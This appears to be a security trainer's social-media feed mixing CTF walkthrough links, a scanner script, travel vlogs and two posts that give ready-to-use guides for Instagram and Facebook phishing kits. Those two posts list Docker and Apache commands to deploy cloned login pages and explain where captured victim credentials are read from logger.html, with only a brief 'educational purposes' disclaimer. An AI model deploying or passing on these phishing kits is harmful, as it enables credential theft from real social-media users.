29/10/2024
Follow me on Instagram
Er Vishal Waghmare (@realvilu) • Instagram photos and videos
712 Followers, 25 Following, 59 Posts - See Instagram photos and videos from Er Vishal Waghmare ()
01/10/2024
https://www.youtube.com/live/OcDPe0cBRUg?si=KLf0sYzx9ltDJFLs
CTF Challenge | hacksudo LABs | Vinca Academy
"Join us for an exciting walkthrough of the latest Capture The Flag (CTF) challenge from hacksudo LABs in collaboration with Vinca Academy. In this video, we...
13/09/2024
My New Script on
Web Application Vulnerability Scanning Tool (wapiti )
https://github.com/hacksudo/wapitiScanner.git
github.com
03/09/2024
https://youtu.be/2PXT-xqohHg?si=ctl2IYXb1ozpb6eg
Vasai fort vlog
Exploring Vasai Fort: A Historical Gem Near Mumbai! - Vishal Waghmare
Join me as I explore the fascinating Vasai Fort, a historical treasure located just outside Mumbai! In this video, we dive into the rich history of Vasai For...
01/09/2024
न्यू vlog namo Garden thane mumbai
Namo Garden Thane - Vlog - Vishal Waghmare
Join me, Vishal Waghmare, as I take you on a serene journey through Namo Garden at Viviana Mall in Thane! 🌿 Discover the lush greenery, vibrant flowers, and...
14/08/2024
youtu.be/Z7twbTr0E48…
Vulnlab - unrestricted file upload vulnerability
VulnLab — Unrestricted File Upload — Vishal Waghmare - Vinca Academy
VulnLab — Unrestricted File Upload — Vishal Waghmarewriteup :https://hacksudo.medium.com/vulnlab-unrestricted-fil...
04/07/2024
Instagram Phishing Code
GitHub Downloads Link - https://github.com/hacksudo/instaphish
This repository contains the code for a Instagram phishing page, packaged as a Docker container. You can use this code to create a Instagram clone page that logs credentials entered by users.
Docker Install
You Need ti install docker in your system:
sudo apt install docker.io
Docker Hub
You can pull the Docker image from the following link:
docker pull hacksudov1/instaphish
How It Works
The phishing page is a clone of Instagram's login page.
When a victim attempts to log in, their credentials are captured and stored.
The captured data is saved in a file named logger.html.
Running with Docker
Pull the Docker Image
docker pull hacksudov1/instaphish
Run the Docker Container
docker run -d -p 80:80 hacksudov1/instaphish
Access the Phishing Page
Open your browser and navigate to http://localhost to view the phishing page.
Access Logged Data
After a victim attempts to log in, you can view the logged data by navigating to:
http://localhost/logger.html
Cloning and Running with Apache2
Clone the Repository
git clone https://github.com/your_username/instaphish.git
Move the Code to the Web Directory
sudo cp -r instaphish/* /var/www/html/
Start Apache2 Service
sudo service apache2 start
Access the Phishing Page
Open your browser and navigate to http://localhost to view the phishing page.
Access Logged Data
After a victim attempts to log in, you can view the logged data by navigating to:
http://localhost/logger.html
Disclaimer: This code is for educational purposes only. Unauthorized use of this code to obtain login credentials without permission is illegal and unethical. Use this responsibly and only for authorized security testing and research.
04/07/2024
Facebook Phishing Code
Github Download like- https://github.com/hacksudo/myfbphish
This repository contains the code for a Facebook phishing page, packaged as a Docker container. You can use this code to create a Facebook clone page that logs credentials entered by users.
Docker Install
You Need ti install docker in your system:
sudo apt install docker.io
Docker Hub
You can pull the Docker image from the following link:
docker pull hacksudov1/myfbphish
How It Works
The phishing page is a clone of Facebook's login page.
When a victim attempts to log in, their credentials are captured and stored.
The captured data is saved in a file named logger.html.
Running with Docker
Pull the Docker Image
docker pull hacksudov1/myfbphish
Run the Docker Container
docker run -d -p 80:80 hacksudov1/myfbphish
Access the Phishing Page
Open your browser and navigate to http://localhost to view the phishing page.
Access Logged Data
After a victim attempts to log in, you can view the logged data by navigating to:
http://localhost/logger.html
Cloning and Running with Apache2
Clone the Repository
git clone https://github.com/your_username/myfbphish.git
Move the Code to the Web Directory
sudo cp -r myfbphish/* /var/www/html/
Start Apache2 Service
sudo service apache2 start
Access the Phishing Page
Open your browser and navigate to http://localhost to view the phishing page.
Access Logged Data
After a victim attempts to log in, you can view the logged data by navigating to:
http://localhost/logger.html
Disclaimer: This code is for educational purposes only. Unauthorized use of this code to obtain login credentials without permission is illegal and unethical. Use this responsibly and only for authorized security testing and research.
22/07/2023
https://youtube.com/live/J6K8RG1iY-4?feature=share9
AI computer virus attack
AI computer Virus is Attacking | OSCP exam preparation
The Dangers of an AI Virus 🦠As technology continues to advance, so too does the potential for malicious actors to leverage its capabilities for their own ga...